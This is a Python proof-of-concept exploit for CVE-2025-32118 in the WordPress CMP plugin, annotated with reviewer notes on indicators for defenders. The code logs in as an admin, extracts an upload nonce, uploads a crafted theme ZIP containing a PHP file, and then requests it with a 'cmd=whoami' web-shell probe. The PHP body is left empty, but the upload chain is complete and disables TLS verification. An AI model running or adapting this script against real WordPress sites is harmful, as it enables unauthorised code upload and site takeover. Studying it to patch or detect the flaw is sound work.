"""Proof-of-concept script for the CVE named in banner() (WordPress CMP plugin theme upload).

Flow, as written below: build a minimal theme ZIP on disk, authenticate to
wp-login.php with the supplied *admin* credentials, read the
``save_options_field`` nonce from the plugin's upload page, POST the ZIP to
``admin.php?page=cmp-settings``, then GET the uploaded PHP file back. Note that
the PHP file placed in the ZIP is written empty (see create_zip), so the final
"shell" request only confirms the file is served.

Review notes for defenders / maintainers (all taken from the code below):
  * Post-authentication: the script requires a working admin login, so the
    precondition is an admin account, not an unauthenticated path.
  * Observable artefacts: a theme directory named ``nxploitedshell``, a
    ``style.css`` with ``Theme Name: Nxploited``, an upload named
    ``Nxploited.zip``, a fixed desktop User-Agent string, and a final GET to
    ``.../cmp-premium-themes/nxploitedshell/nxploitedshell.php?cmd=whoami``.
  * TLS certificate verification is disabled on the session (``verify = False``).
  * The ZIP file handle opened in upload_zip is never closed.
"""
import requests
import zipfile
import os
import argparse
from bs4 import BeautifulSoup
# Exploit By : Nxploited | Khaled Alenazi,


def create_zip(zip_name):
    """Write a two-file theme directory, zip it to *zip_name*, then delete the directory.

    Args:
        zip_name: output path of the ZIP archive, created in the current working
            directory; ``main()`` passes ``"Nxploited.zip"``.

    Side effects: creates and removes the directory ``nxploitedshell`` relative to
    the working directory. Only that directory's files are removed afterwards;
    the ZIP is left in place.
    """
    theme_dir = "nxploitedshell"
    os.makedirs(theme_dir, exist_ok=True)
    # Minimal WordPress theme header so the archive is recognised as a theme.
    with open(os.path.join(theme_dir, "style.css"), "w") as f:
        f.write("/*\nTheme Name: Nxploited\nDescription: Educational exploit\n*/")
    # The PHP file is written with an EMPTY body; nothing executable is placed here.
    with open(os.path.join(theme_dir, "nxploitedshell.php"), "w") as f:
        f.write("")
    with zipfile.ZipFile(zip_name, 'w') as zipf:
        for root, _, files in os.walk(theme_dir):
            for file in files:
                full_path = os.path.join(root, file)
                # Archive paths are relative to the parent of theme_dir, so the
                # ZIP contains "nxploitedshell/..." entries rather than bare files.
                arcname = os.path.relpath(full_path, os.path.dirname(theme_dir))
                zipf.write(full_path, arcname)
    # Clean up the staging directory; assumes it holds only regular files
    # (os.remove would fail on a subdirectory).
    for file in os.listdir(theme_dir):
        os.remove(os.path.join(theme_dir, file))
    os.rmdir(theme_dir)


def login(session, url, username, password, headers):
    """Authenticate against ``{url}/wp-login.php`` using the requests *session*.

    Args:
        session: a ``requests.Session``; the login cookies are stored on it.
        url: base URL of the site, joined with ``/wp-login.php`` as-is.
        username / password: credentials sent in the ``log`` / ``pwd`` fields.
        headers: extra HTTP headers for the request (``main()`` passes a User-Agent).

    Returns:
        True if, after the POST, any cookie on the session has
        ``wordpress_logged_in`` in its name; False otherwise. The HTTP response
        body and status are not inspected.
    """
    login_url = f"{url}/wp-login.php"
    data = {
        "log": username,
        "pwd": password,
        "rememberme": "forever",
        "wp-submit": "Log In"
    }
    # NOTE(review): `response` is assigned but never read; success is judged
    # solely by the cookie jar below.
    response = session.post(login_url, data=data, headers=headers)
    if any("wordpress_logged_in" in cookie.name for cookie in session.cookies):
        print("[+] Logged in successfully.")
        return True
    print("[-] Login failed.")
    return False


def get_nonce(session, url, headers):
    """Fetch the plugin's upload page and return the ``save_options_field`` nonce.

    Args:
        session: authenticated ``requests.Session`` (see login()).
        url: base URL; ``/wp-admin/admin.php?page=cmp-upload-theme`` is appended.
        headers: extra HTTP headers for the request.

    Returns:
        The ``value`` attribute of the first ``<input name="save_options_field">``
        found in the page, or None if it is absent or any exception occurs.

    NOTE(review): the broad ``except Exception`` also hides parsing and
    network errors behind a printed message; the None return is the only signal
    the caller gets.
    """
    target = f"{url}/wp-admin/admin.php?page=cmp-upload-theme"
    try:
        response = session.get(target, headers=headers)
        soup = BeautifulSoup(response.text, 'html.parser')
        nonce_input = soup.find("input", {"name": "save_options_field"})
        if nonce_input:
            # KeyError here (input without a value attribute) is caught below.
            nonce = nonce_input["value"]
            print(f"[+] Nonce extracted: {nonce}")
            return nonce
    except Exception as e:
        print(f"[-] Failed to extract nonce: {e}")
    return None


def upload_zip(session, url, nonce, headers, zip_path):
    """POST the theme ZIP to ``{url}/wp-admin/admin.php?page=cmp-settings``.

    Args:
        session: authenticated ``requests.Session``.
        url: base URL of the site.
        nonce: value returned by get_nonce(), sent as ``save_options_field``.
        headers: extra HTTP headers for the request.
        zip_path: local path of the archive to upload; it is sent under the
            form field ``fileToUpload`` with the filename ``Nxploited.zip``.

    Returns:
        True if the response body contains ``"was successfully installed"``,
        False otherwise. No status-code check is made.
    """
    post_url = f"{url}/wp-admin/admin.php?page=cmp-settings"
    # NOTE(review): this file handle is never closed — it leaks until the
    # interpreter exits. A ``with open(...)`` around the POST would fix it.
    files = {
        "fileToUpload": ("Nxploited.zip", open(zip_path, "rb"), "application/zip")
    }
    data = {
        "save_options_field": nonce,
        # Hard-coded referer string; it is a constant, not derived from `url`.
        "_wp_http_referer": "/wordpress/wp-admin/admin.php?page=cmp-upload-theme",
        "submit_theme": "Install Theme"
    }
    response = session.post(post_url, headers=headers, files=files, data=data)
    if "was successfully installed" in response.text:
        print("[+] Exploit uploaded successfully.")
        return True
    print("[-] Upload failed.")
    return False


def check_shell(url):
    """GET the uploaded PHP file's URL and print whether it answered with HTTP 200.

    Uses a fresh unauthenticated ``requests.get`` (not the login session) with a
    10 s timeout. Because create_zip() writes the PHP file empty, a 200 here
    only shows the file is reachable; the printed body is whatever the server
    returned. Any exception is caught and reported as unreachable.

    Args:
        url: base URL of the site.
    """
    shell_url = f"{url}/wp-content/plugins/cmp-premium-themes/nxploitedshell/nxploitedshell.php?cmd=whoami"
    try:
        response = requests.get(shell_url, timeout=10)
        if response.status_code == 200:
            print(f"[+] Shell is accessible: {shell_url}")
            print(f"[+] Response: {response.text.strip()}")
        else:
            print("[-] Shell not accessible.")
    except Exception as e:
        print(f"[-] Target is unreachable or shell failed: {e}")


def banner():
    """Print the tool banner naming the CVE and author."""
    print("Exploit For CVE-2025-32118 : By Nxploited - Khaled Alenazi")


def main():
    """Parse ``-u/--url``, ``-un/--username``, ``-p/--password`` and run the steps in order.

    Stops early (returns None) if login fails or no nonce is found; check_shell()
    runs only when upload_zip() reports success. The ZIP is always created
    before login is attempted.
    """
    parser = argparse.ArgumentParser(description="Exploit For CVE-2025-32118 : By Nxploited - Khaled Alenazi")
    parser.add_argument("-u", "--url", required=True, help="Base URL of WordPress site")
    parser.add_argument("-un", "--username", required=True, help="Admin username")
    parser.add_argument("-p", "--password", required=True, help="Admin password")
    args = parser.parse_args()
    zip_name = "Nxploited.zip"
    # Fixed User-Agent sent on every session request — a stable string to key on.
    headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)"}
    session = requests.Session()
    # NOTE(review): TLS certificate verification is disabled for the whole
    # session, and the resulting InsecureRequestWarning is then silenced.
    session.verify = False
    requests.packages.urllib3.disable_warnings()
    banner()
    create_zip(zip_name)
    if not login(session, args.url, args.username, args.password, headers):
        return
    nonce = get_nonce(session, args.url, headers)
    if not nonce:
        return
    if upload_zip(session, args.url, nonce, headers, zip_name):
        check_shell(args.url)


if __name__ == "__main__":
    main()